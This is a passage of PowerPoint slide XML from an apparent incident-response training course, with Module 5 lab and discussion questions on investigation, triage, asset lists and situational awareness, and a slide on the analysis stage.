    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA24A2A9-59E2-0542-826D-87D524D2C0F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Module 5 Lab:  Questions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89090" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F173197-119F-B84C-B670-FF229451F131}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8256587" cy="430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215900" indent="-2159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1pPr>
            <a:lvl2pPr marL="431800" indent="-2159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14000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Incident Investigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Combining these various bits of information, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>what are your conclusions? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do you have any actionable information? </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If so, what action will you take? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploratory analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>From the knowledge gained from this incident, what additional areas might you explore to discover additional anomalies and threats?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12DE4D55-EC66-8B4E-B2CE-DAD4F0B484B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1520825"/>
            <a:ext cx="8228012"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Module 5 Discussion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91138" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E7513EB-08E3-0047-B5C7-261AD9E22767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="2093913"/>
            <a:ext cx="5229225" cy="3417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14000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Analysis </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AEF4094-AACB-E246-9C4B-0D7AB3D244B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Module 5 Discussion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93186" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2978424F-4F7D-994C-9992-214DA5C30AAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8256587" cy="430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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How does your team triage and select the top priority issues to work on at any given time? Is your method formal or informal?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Describe a time when proactive exploratory investigation led to the discovery or quicker analysis of an impending threat. How did you originally decide to explore that aspect of your security landscape?  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>List the key item categories included in your asset list.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How do you maintain your asset list, whether from an organizational or national CSIRT? Is it manual or automated? If automated, what tool do you use?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Describe your organization’s situational awareness (both internal and external) right now. That is, what are your areas of greatest concern? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Does today’s situational awareness differ from that of six months ago? If so, in what areas is it different?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What are the key metrics your organization uses to identify security status, operational effectiveness, and trends?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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slow">
    <p:fade thruBlk="1"/>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slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8CBC0A-E1C8-254F-AC13-214D9AA9E317}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="6472238"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fundamentals of the analysis stage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13314" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95214A6D-09C3-B848-97FA-FB69D505F61E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2411760" y="1468438"/>
            <a:ext cx="8256587" cy="430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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reach new conclusions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Synthesize new information from multiple sources </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Often manual, requiring perceptive observations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3 broad types of results:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{758614F4-FE2A-EC47-9F12-A8AEFA25A421}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="579959" y="4189082"/>
            <a:ext cx="1528762" cy="698500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4F81BD"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13317" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E7C300E-DF4E-1549-B7B8-203DF342E93C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3017838" y="3200400"/>
            <a:ext cx="2835275" cy="639763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="66CC00"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>remediation &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>prevention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13318" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{109E2886-5A09-884A-A35F-B3AFEEB1E2E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6400800" y="3200400"/>
            <a:ext cx="2305050" cy="639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Lst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>know what to do</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13319" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A66E0BBB-ABEB-BF4F-B70A-4F03FC84672A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3017838" y="4222750"/>
            <a:ext cx="2835275" cy="639763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC9966"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
